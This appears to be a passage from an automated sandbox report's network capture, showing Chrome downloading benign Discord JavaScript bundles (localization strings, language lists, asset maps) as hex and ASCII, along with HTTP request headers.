                                                                          2023-12-10 16:45:18 UTC1130INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 39 36 31 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 66 36 39 36 38 38 65 30 36 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:18 GMTContent-Type: application/javascriptContent-Length: 59613Connection: closeCF-Ray: 8336f51f69688e06-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:18 UTC239INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 35 33 34 38 22 5d 2c 7b 38 37 36 37 37 39 3a 66 75 6e 63 74 69 6f 6e 28 49 2c 4e 2c 41 29 7b 49 2e 65 78 70 6f 72 74 73 3d 7b 43 6f 6d 6d 6f 6e 3a 7b 4f 50 45 4e 5f 44 49 53 43 4f 52 44 3a 22 4f 70 65 6e 20 44 69 73 63 6f 72 64 22 2c 53 49 47 4e 5f 55 50 5f 4e 4f 57 3a 22 53 69 67 6e 20 55 70 20 4e 6f 77 22 7d 2c 46 6f 6f 74 65 72 3a 7b 52 45 41 44 59 5f 54 4f 5f 54 52 59 5f 44 49 53 43 4f 52 44 3a 22 52 65 61 64 79 20 74 6f 20 74 72 79 20 44 69 73 63 6f 72 64 3f 20 49 74 27 73 20 66 72 65 65
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["55348"],{876779:function(I,N,A){I.exports={Common:{OPEN_DISCORD:"Open Discord",SIGN_UP_NOW:"Sign Up Now"},Footer:{READY_TO_TRY_DISCORD:"Ready to try Discord? It's free
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 21 22 2c 4a 4f 49 4e 5f 4f 56 45 52 5f 50 4c 41 59 45 52 53 5f 54 4f 44 41 59 3a 22 4a 4f 49 4e 20 4f 56 45 52 20 7b 6e 75 6d 7d 20 4d 49 4c 4c 49 4f 4e 20 50 4c 41 59 45 52 53 20 54 4f 44 41 59 22 7d 2c 4e 61 76 69 67 61 74 69 6f 6e 3a 7b 48 4f 4d 45 3a 22 48 6f 6d 65 22 2c 46 45 41 54 55 52 45 53 3a 22 46 65 61 74 75 72 65 73 22 2c 4e 49 54 52 4f 3a 22 4e 69 74 72 6f 22 2c 44 4f 57 4e 4c 4f 41 44 3a 22 44 6f 77 6e 6c 6f 61 64 22 2c 50 41 52 54 4e 45 52 53 3a 22 50 61 72 74 6e 65 72 73 22 2c 42 4c 4f 47 3a 22 42 6c 6f 67 22 2c 4d 4f 52 45 3a 22 4d 6f 72 65 22 2c 53 54 41 54 55 53 3a 22 53 74 61 74 75 73 22 2c 46 45 45 44 42 41 43 4b 3a 22 46 65 65 64 62 61 63 6b 22 2c 48 45 4c 50 5f 41 4e 44 5f 53 55 50 50 4f 52 54 3a 22 48 65 6c 70 20 26 20 53 75 70 70
                                                                          Data Ascii: !",JOIN_OVER_PLAYERS_TODAY:"JOIN OVER {num} MILLION PLAYERS TODAY"},Navigation:{HOME:"Home",FEATURES:"Features",NITRO:"Nitro",DOWNLOAD:"Download",PARTNERS:"Partners",BLOG:"Blog",MORE:"More",STATUS:"Status",FEEDBACK:"Feedback",HELP_AND_SUPPORT:"Help & Supp
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 2e 6a 73 6f 6e 22 3a 22 37 32 39 35 32 22 2c 22 2e 2f 66 72 22 3a 22 36 39 39 39 34 30 22 2c 22 2e 2f 66 72 2e 6a 73 6f 6e 22 3a 22 36 39 39 39 34 30 22 2c 22 2e 2f 68 69 22 3a 22 39 32 32 35 30 39 22 2c 22 2e 2f 68 69 2e 6a 73 6f 6e 22 3a 22 39 32 32 35 30 39 22 2c 22 2e 2f 68 72 22 3a 22 32 39 33 32 30 30 22 2c 22 2e 2f 68 72 2e 6a 73 6f 6e 22 3a 22 32 39 33 32 30 30 22 2c 22 2e 2f 68 75 22 3a 22 32 35 34 39 35 37 22 2c 22 2e 2f 68 75 2e 6a 73 6f 6e 22 3a 22 32 35 34 39 35 37 22 2c 22 2e 2f 69 64 22 3a 22 38 38 36 30 34 34 22 2c 22 2e 2f 69 64 2e 6a 73 6f 6e 22 3a 22 38 38 36 30 34 34 22 2c 22 2e 2f 69 74 22 3a 22 39 30 33 34 32 32 22 2c 22 2e 2f 69 74 2e 6a 73 6f 6e 22 3a 22 39 30 33 34 32 32 22 2c 22 2e 2f 6a 61 22 3a 22 34 34 38 36 37 22 2c 22 2e 2f
                                                                          Data Ascii: .json":"72952","./fr":"699940","./fr.json":"699940","./hi":"922509","./hi.json":"922509","./hr":"293200","./hr.json":"293200","./hu":"254957","./hu.json":"254957","./id":"886044","./id.json":"886044","./it":"903422","./it.json":"903422","./ja":"44867","./
                                                                          2023-12-10 16:45:18 UTC40INData Raw: 6e 67 6c 69 73 68 4e 61 6d 65 3a 22 43 7a 65 63 68 22 2c 63 6f 64 65 3a 22 63 73 22 2c 65 6e 61 62 6c 65 64 3a 21 30 7d
                                                                          Data Ascii: nglishName:"Czech",code:"cs",enabled:!0}
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 2c 7b 6e 61 6d 65 3a 22 44 61 6e 73 6b 22 2c 65 6e 67 6c 69 73 68 4e 61 6d 65 3a 22 44 61 6e 69 73 68 22 2c 63 6f 64 65 3a 22 64 61 22 2c 65 6e 61 62 6c 65 64 3a 21 30 7d 2c 7b 6e 61 6d 65 3a 22 4e 65 64 65 72 6c 61 6e 64 73 22 2c 65 6e 67 6c 69 73 68 4e 61 6d 65 3a 22 44 75 74 63 68 22 2c 63 6f 64 65 3a 22 6e 6c 22 2c 65 6e 61 62 6c 65 64 3a 21 30 7d 2c 7b 6e 61 6d 65 3a 22 46 72 61 6e 5c 78 65 37 61 69 73 22 2c 65 6e 67 6c 69 73 68 4e 61 6d 65 3a 22 46 72 65 6e 63 68 22 2c 63 6f 64 65 3a 22 66 72 22 2c 65 6e 61 62 6c 65 64 3a 21 30 7d 2c 7b 6e 61 6d 65 3a 22 44 65 75 74 73 63 68 22 2c 65 6e 67 6c 69 73 68 4e 61 6d 65 3a 22 47 65 72 6d 61 6e 22 2c 63 6f 64 65 3a 22 64 65 22 2c 65 6e 61 62 6c 65 64 3a 21 30 7d 2c 7b 6e 61 6d 65 3a 22 ce 95 ce bb ce bb ce
                                                                          Data Ascii: ,{name:"Dansk",englishName:"Danish",code:"da",enabled:!0},{name:"Nederlands",englishName:"Dutch",code:"nl",enabled:!0},{name:"Fran\xe7ais",englishName:"French",code:"fr",enabled:!0},{name:"Deutsch",englishName:"German",code:"de",enabled:!0},{name:"
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 21 30 7d 2c 7b 6e 61 6d 65 3a 22 53 75 6f 6d 69 22 2c 65 6e 67 6c 69 73 68 4e 61 6d 65 3a 22 46 69 6e 6e 69 73 68 22 2c 63 6f 64 65 3a 22 66 69 22 2c 65 6e 61 62 6c 65 64 3a 21 30 7d 2c 7b 6e 61 6d 65 3a 22 52 6f 6d 5c 78 65 32 6e c4 83 22 2c 65 6e 67 6c 69 73 68 4e 61 6d 65 3a 22 52 6f 6d 61 6e 69 61 6e 22 2c 63 6f 64 65 3a 22 72 6f 22 2c 65 6e 61 62 6c 65 64 3a 21 30 7d 2c 7b 6e 61 6d 65 3a 22 4c 69 65 74 75 76 69 c5 a1 6b 61 69 22 2c 65 6e 67 6c 69 73 68 4e 61 6d 65 3a 22 4c 69 74 68 75 61 6e 69 61 6e 22 2c 63 6f 64 65 3a 22 6c 74 22 2c 65 6e 61 62 6c 65 64 3a 21 30 7d 2c 7b 6e 61 6d 65 3a 22 e0 b9 84 e0 b8 97 e0 b8 a2 22 2c 65 6e 67 6c 69 73 68 4e 61 6d 65 3a 22 54 68 61 69 22 2c 63 6f 64 65 3a 22 74 68 22 2c 65 6e 61 62 6c 65 64 3a 21 30 7d 2c 7b 6e
                                                                          Data Ascii: !0},{name:"Suomi",englishName:"Finnish",code:"fi",enabled:!0},{name:"Rom\xe2n",englishName:"Romanian",code:"ro",enabled:!0},{name:"Lietuvikai",englishName:"Lithuanian",code:"lt",enabled:!0},{name:"",englishName:"Thai",code:"th",enabled:!0},{n
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 4e 5f 53 45 43 55 52 49 54 59 3a 22 d0 a1 d0 b8 d0 b3 d1 83 d1 80 d0 bd d0 be d1 81 d1 82 22 2c 4e 41 56 49 47 41 54 49 4f 4e 5f 44 45 56 45 4c 4f 50 45 52 53 3a 22 d0 a0 d0 b0 d0 b7 d1 80 d0 b0 d0 b1 d0 be d1 82 d1 87 d0 b8 d1 86 d0 b8 22 2c 4e 41 56 49 47 41 54 49 4f 4e 5f 44 4f 43 55 4d 45 4e 54 41 54 49 4f 4e 3a 22 d0 94 d0 be d0 ba d1 83 d0 bc d0 b5 d0 bd d1 82 d0 b0 d1 86 d0 b8 d1 8f 22 2c 4e 41 56 49 47 41 54 49 4f 4e 5f 42 52 41 4e 44 49 4e 47 3a 22 d0 91 d1 80 d0 b0 d0 bd d0 b4 d0 b8 d1 80 d0 b0 d0 bd d0 b5 22 2c 4e 41 56 49 47 41 54 49 4f 4e 5f 4c 4f 47 49 4e 3a 22 d0 92 d0 bf d0 b8 d1 81 d0 b2 d0 b0 d0 bd d0 b5 22 2c 4e 41 56 49 47 41 54 49 4f 4e 5f 4f 50 45 4e 3a 22 d0 9e d1 82 d0 b2 d0 b0 d1 80 d1 8f d0 bd d0 b5 22 2c 4e 41 56 49 47 41 54 49
                                                                          Data Ascii: N_SECURITY:"",NAVIGATION_DEVELOPERS:"",NAVIGATION_DOCUMENTATION:"",NAVIGATION_BRANDING:"",NAVIGATION_LOGIN:"",NAVIGATION_OPEN:"",NAVIGATI
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 49 53 43 4f 52 44 3a 22 43 68 63 65 c5 a1 20 76 79 7a 6b 6f 75 c5 a1 65 74 20 44 69 73 63 6f 72 64 3f 20 4a 65 20 7a 64 61 72 6d 61 21 22 2c 46 4f 4f 54 45 52 5f 4a 4f 49 4e 5f 4f 56 45 52 5f 50 4c 41 59 45 52 53 5f 54 4f 44 41 59 3a 22 50 c5 98 49 50 4f 4a 20 53 45 20 4a 45 c5 a0 54 c4 9a 20 44 4e 45 53 20 4b 20 56 5c 78 63 64 43 45 20 4e 45 c5 bd 20 7b 6e 75 6d 7d 5c 78 61 30 4d 49 4c 49 4f 4e c5 ae 4d 20 48 52 5c 78 63 31 c4 8c c5 ae 22 2c 4e 41 56 49 47 41 54 49 4f 4e 5f 48 4f 4d 45 3a 22 5c 78 64 61 76 6f 64 22 2c 4e 41 56 49 47 41 54 49 4f 4e 5f 46 45 41 54 55 52 45 53 3a 22 46 75 6e 6b 63 65 22 2c 4e 41 56 49 47 41 54 49 4f 4e 5f 4e 49 54 52 4f 3a 22 4e 69 74 72 6f 22 2c 4e 41 56 49 47 41 54 49 4f 4e 5f 44 4f 57 4e 4c 4f 41 44 3a 22 53 74 5c 78 65
                                                                          Data Ascii: ISCORD:"Chce vyzkouet Discord? Je zdarma!",FOOTER_JOIN_OVER_PLAYERS_TODAY:"PIPOJ SE JET DNES K V\xcdCE NE {num}\xa0MILIONM HR\xc1",NAVIGATION_HOME:"\xdavod",NAVIGATION_FEATURES:"Funkce",NAVIGATION_NITRO:"Nitro",NAVIGATION_DOWNLOAD:"St\xe
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 43 41 44 45 4d 59 3a 22 41 6b 61 64 65 6d 69 65 20 70 72 6f 20 6d 6f 64 65 72 5c 78 65 31 74 6f 72 79 22 2c 4e 41 56 49 47 41 54 49 4f 4e 5f 44 49 53 43 4f 56 45 52 3a 22 4f 62 6a 65 76 6f 76 61 74 22 2c 4e 41 56 49 47 41 54 49 4f 4e 5f 43 41 52 45 45 52 53 3a 22 4b 61 72 69 5c 78 65 39 72 61 22 2c 4e 55 4d 42 45 52 41 42 42 52 45 56 49 41 54 49 4f 4e 53 5f 4d 49 4c 4c 49 4f 4e 3a 22 7b 6e 75 6d 7d 5c 78 61 30 6d 69 6c 2e 22 2c 4e 55 4d 42 45 52 41 42 42 52 45 56 49 41 54 49 4f 4e 53 5f 54 48 4f 55 53 41 4e 44 3a 22 7b 6e 75 6d 7d 5c 78 61 30 74 69 73 2e 22 2c 44 59 4e 41 4d 49 43 4c 49 4e 4b 53 5f 49 4f 53 5f 41 50 50 5f 50 52 45 56 49 45 57 5f 44 45 53 43 52 49 50 54 49 4f 4e 3a 22 4d 5c 78 65 64 73 74 6f 2c 20 6b 64 65 20 73 69 20 6d c5 af c5 be 65 c5
                                                                          Data Ascii: CADEMY:"Akademie pro moder\xe1tory",NAVIGATION_DISCOVER:"Objevovat",NAVIGATION_CAREERS:"Kari\xe9ra",NUMBERABBREVIATIONS_MILLION:"{num}\xa0mil.",NUMBERABBREVIATIONS_THOUSAND:"{num}\xa0tis.",DYNAMICLINKS_IOS_APP_PREVIEW_DESCRIPTION:"M\xedsto, kde si me


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          316192.168.2.550052162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:18 UTC866OUTGET /assets/70941.610eda6b5366c83284d8.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=R4LQ9eAOy65FjFKBoqbEAGdchuqmDzFj3MHXAoIITyo-1702226717665-0-604800000
                                                                          2023-12-10 16:45:18 UTC965INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 32 30 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 66 61 63 66 62 32 31 64 66 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:18 GMTContent-Type: application/javascriptContent-Length: 10203Connection: closeCF-Ray: 8336f51facfb21df-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:18 UTC404INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 30 39 34 31 22 5d 2c 7b 36 30 36 38 36 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 33 32 31 61 30 37 63 62 63 36 66 35 39 31 39 64 62 63 65 39 2e 73 76 67 22 7d 2c 38 33 39 34 39 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 61 38 32 36 65 34 34 35 64 66 66 39 37 63 66 31 35 33 33 35 2e 73 76 67 22 7d 2c 31 36 34 36 35 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["70941"],{606863:function(e,t,n){"use strict";e.exports=n.p+"321a07cbc6f5919dbce9.svg"},839491:function(e,t,n){"use strict";e.exports=n.p+"a826e445dff97cf15335.svg"},164654:function(e,
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 37 34 34 32 62 35 37 36 33 34 37 63 31 64 30 32 38 38 36 66 2e 73 76 67 22 7d 2c 33 36 37 34 36 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 33 32 30 35 64 61 32 65 38 66 37 38 36 33 33 35 38 33 64 30 2e 73 76 67 22 7d 2c 32 33 39 33 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 38 66 35 38 31 66 39 31 65 37 65 36 35 30 61 63 38 37 61 32 2e 73 76 67 22 7d 2c 32 38 33 33 39 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63
                                                                          Data Ascii: tion(e,t,n){"use strict";e.exports=n.p+"7442b576347c1d02886f.svg"},367469:function(e,t,n){"use strict";e.exports=n.p+"3205da2e8f78633583d0.svg"},23933:function(e,t,n){"use strict";e.exports=n.p+"8f581f91e7e650ac87a2.svg"},283397:function(e,t,n){"use stric
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 7d 2c 75 70 64 61 74 65 47 61 6d 69 6e 67 53 74 61 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 7d 29 3b 76 61 72 20 73 3d 6e 28 22 38 37 32 37 31 37 22 29 2c 69 3d 6e 28 22 32 39 35 34 32 36 22 29 2c 61 3d 6e 28 22 38 31 39 36 38 39 22 29 2c 6c 3d 6e 28 22 35 32 39 38 30 35 22 29 2c 72 3d 6e 28 22 34 32 32 30 33 22 29 2c 75 3d 6e 28 22 34 37 34 36 34 33 22 29 2c 63 3d 6e 28 22 33 37 37 32 35 33 22 29 2c 6f 3d 6e 28 22 36 35 39 35 30 30 22 29 2c 64 3d 6e 28 22 34 39 31 31 31 22 29 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 73 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 64 2e 45 6e 64 70 6f 69 6e 74 73 2e 49 4e 49 54 49 41 54 45 5f 43 48 41 4e 4e 45 4c 5f 50
                                                                          Data Ascii: :function(){return p},updateGamingStats:function(){return E}});var s=n("872717"),i=n("295426"),a=n("819689"),l=n("529805"),r=n("42203"),u=n("474643"),c=n("377253"),o=n("659500"),d=n("49111");function h(e){s.default.post({url:d.Endpoints.INITIATE_CHANNEL_P
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 49 54 45 5f 53 49 5a 45 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 2c 43 4f 4d 4d 4f 4e 5f 43 4f 4e 46 45 54 54 49 5f 42 41 53 45 5f 43 4f 4e 46 49 47 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 2c 43 4f 4d 4d 4f 4e 5f 43 4f 4e 46 45 54 54 49 5f 45 4e 56 49 52 4f 4e 4d 45 4e 54 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 73 3d 6e 28 22 35 31 36 35 35 35 22 29 2c 69 3d 6e 28 22 38 33 39 34 39 31 22 29 3b 6c 65 74 20 61 3d 69 2c 6c 3d 5b 22 23 46 46 37 33 46 41 22 2c 22 23 46 46 43 30 46 46 22 2c 22 23 46 46 44 38 33 36 22 2c 22 23 46 46 39 41 31 35 22 2c 22 23 41 35 46 37 44 45 22 2c 22 23 35 31 42 43 39 44 22 2c 22 23 41 45 43 37 46 46 22 2c 22 23 33 45 37 30 44 44 22 5d 2c 72
                                                                          Data Ascii: ITE_SIZE:function(){return u},COMMON_CONFETTI_BASE_CONFIG:function(){return c},COMMON_CONFETTI_ENVIRONMENT:function(){return o}});var s=n("516555"),i=n("839491");let a=i,l=["#FF73FA","#FFC0FF","#FFD836","#FF9A15","#A5F7DE","#51BC9D","#AEC7FF","#3E70DD"],r
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 6f 75 6e 74 73 28 65 2c 74 2c 73 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 7d 67 65 74 47 75 69 6c 64 45 76 65 6e 74 55 73 65 72 73 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 64 65 66 61 75 6c 74 2e 66 65 74 63 68 55 73 65 72 73 46 6f 72 47 75 69 6c 64 45 76 65 6e 74 28 65 2c 74 2c 6e 29 7d 67 65 74 47 75 69 6c 64 45 76 65 6e 74 73 46 6f 72 43 75 72 72 65 6e 74 55 73 65 72 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 65 29 7d 68 61 6e 64 6c 65 43 6f 6e 6e 65 63 74 69 6f 6e 4f 70 65 6e 28 29 7b 63 2e 63 6c 65 61 72 28 29 2c 75 3d 7b 7d 3b 6c 65 74 20 65 3d 28 30 2c 69 2e 69 73 49 6e 4d 61 69 6e 54 61 62 73 45 78 70 65 72 69 6d 65 6e 74 29 28 29 2c 74 3d 61 2e 64 65 66 61 75 6c 74 2e 67 65 74 4c 61 73 74 53 65 6c 65 63 74 65 64 47 75 69 6c 64 49 64 28 29 3b
                                                                          Data Ascii: ounts(e,t,s)}catch(e){}}}getGuildEventUsers(e,t,n){return r.default.fetchUsersForGuildEvent(e,t,n)}getGuildEventsForCurrentUser(e){return o(e)}handleConnectionOpen(){c.clear(),u={};let e=(0,i.isInMainTabsExperiment)(),t=a.default.getLastSelectedGuildId();
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 61 67 65 49 64 3a 74 7d 3d 65 3b 69 66 28 6e 75 6c 6c 21 3d 74 68 69 73 2e 63 75 72 72 65 6e 74 6c 79 56 69 73 69 62 6c 65 4d 65 73 73 61 67 65 54 69 6d 65 72 73 5b 74 5d 7c 7c 74 68 69 73 2e 76 69 65 77 73 49 6e 43 75 72 72 65 6e 74 43 68 61 6e 6e 65 6c 2e 68 61 73 28 74 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 6e 3d 74 68 69 73 2e 72 65 63 65 6e 74 56 69 65 77 54 69 6d 65 73 2e 67 65 74 28 74 29 3b 69 66 28 6e 75 6c 6c 21 3d 6e 26 26 44 61 74 65 2e 6e 6f 77 28 29 2d 6e 3c 36 65 34 29 72 65 74 75 72 6e 3b 6c 65 74 20 73 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 64 65 6c 65 74 65 20 74 68 69 73 2e 63 75 72 72 65 6e 74 6c 79 56 69 73 69 62 6c 65 4d 65 73 73 61 67 65 54 69 6d 65 72 73 5b 74 5d 2c 74 68 69 73 2e 76 69 65 77 73 49 6e 43 75 72 72 65 6e
                                                                          Data Ascii: ageId:t}=e;if(null!=this.currentlyVisibleMessageTimers[t]||this.viewsInCurrentChannel.has(t))return;let n=this.recentViewTimes.get(t);if(null!=n&&Date.now()-n<6e4)return;let s=setTimeout(()=>{delete this.currentlyVisibleMessageTimers[t],this.viewsInCurren
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 74 63 68 42 75 66 66 65 72 2e 70 75 73 68 28 65 29 2c 6e 75 6c 6c 3d 3d 74 68 69 73 2e 62 61 74 63 68 54 69 6d 65 72 49 64 26 26 28 74 68 69 73 2e 62 61 74 63 68 54 69 6d 65 72 49 64 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 74 68 69 73 2e 64 72 61 69 6e 42 75 66 66 65 72 28 29 2c 32 65 33 29 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 2e 2e 2e 65 29 7b 73 75 70 65 72 28 2e 2e 2e 65 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 6c 79 56 69 73 69 62 6c 65 4d 65 73 73 61 67 65 54 69 6d 65 72 73 3d 7b 7d 2c 74 68 69 73 2e 76 69 65 77 73 49 6e 43 75 72 72 65 6e 74 43 68 61 6e 6e 65 6c 3d 6e 65 77 20 53 65 74 2c 74 68 69 73 2e 72 65 63 65 6e 74 56 69 65 77 54 69 6d 65 73 3d 6e 65 77 20 69 28 7b 6d 61 78 3a 35 30 30 2c 6d 61 78 41 67 65 3a 36 65 34 7d 29 2c 74
                                                                          Data Ascii: tchBuffer.push(e),null==this.batchTimerId&&(this.batchTimerId=setTimeout(()=>this.drainBuffer(),2e3))}constructor(...e){super(...e),this.currentlyVisibleMessageTimers={},this.viewsInCurrentChannel=new Set,this.recentViewTimes=new i({max:500,maxAge:6e4}),t
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 28 7b 70 6f 70 6f 75 74 4f 70 65 6e 3a 21 31 7d 29 2c 6e 75 6c 6c 3d 3d 65 7c 7c 65 28 29 7d 2c 74 68 69 73 2e 72 65 6e 64 65 72 55 73 65 72 50 6f 70 6f 75 74 3d 65 3d 3e 7b 6c 65 74 7b 63 6c 61 73 73 4e 61 6d 65 3a 74 2c 64 69 73 61 62 6c 65 50 6f 70 6f 75 74 3a 6e 2c 6f 6e 43 6f 6e 74 65 78 74 4d 65 6e 75 3a 69 2c 75 73 65 72 3a 61 2c 73 74 61 74 75 73 3a 63 2c 74 65 78 74 43 6c 61 73 73 4e 61 6d 65 3a 6f 2c 6e 69 63 6b 3a 64 2c 67 75 69 6c 64 49 64 3a 66 7d 3d 74 68 69 73 2e 70 72 6f 70 73 3b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 73 29 28 68 2e 64 65 66 61 75 6c 74 2c 7b 61 6c 69 67 6e 3a 68 2e 64 65 66 61 75 6c 74 2e 41 6c 69 67 6e 2e 43 45 4e 54 45 52 2c 63 6c 61 73 73 4e 61 6d 65 3a 6c 28 70 2e 6d 65 6d 62 65 72 4c 69 73 74 49 74 65 6d 2c 74 2c
                                                                          Data Ascii: ({popoutOpen:!1}),null==e||e()},this.renderUserPopout=e=>{let{className:t,disablePopout:n,onContextMenu:i,user:a,status:c,textClassName:o,nick:d,guildId:f}=this.props;return(0,s.jsxs)(h.default,{align:h.default.Align.CENTER,className:l(p.memberListItem,t,
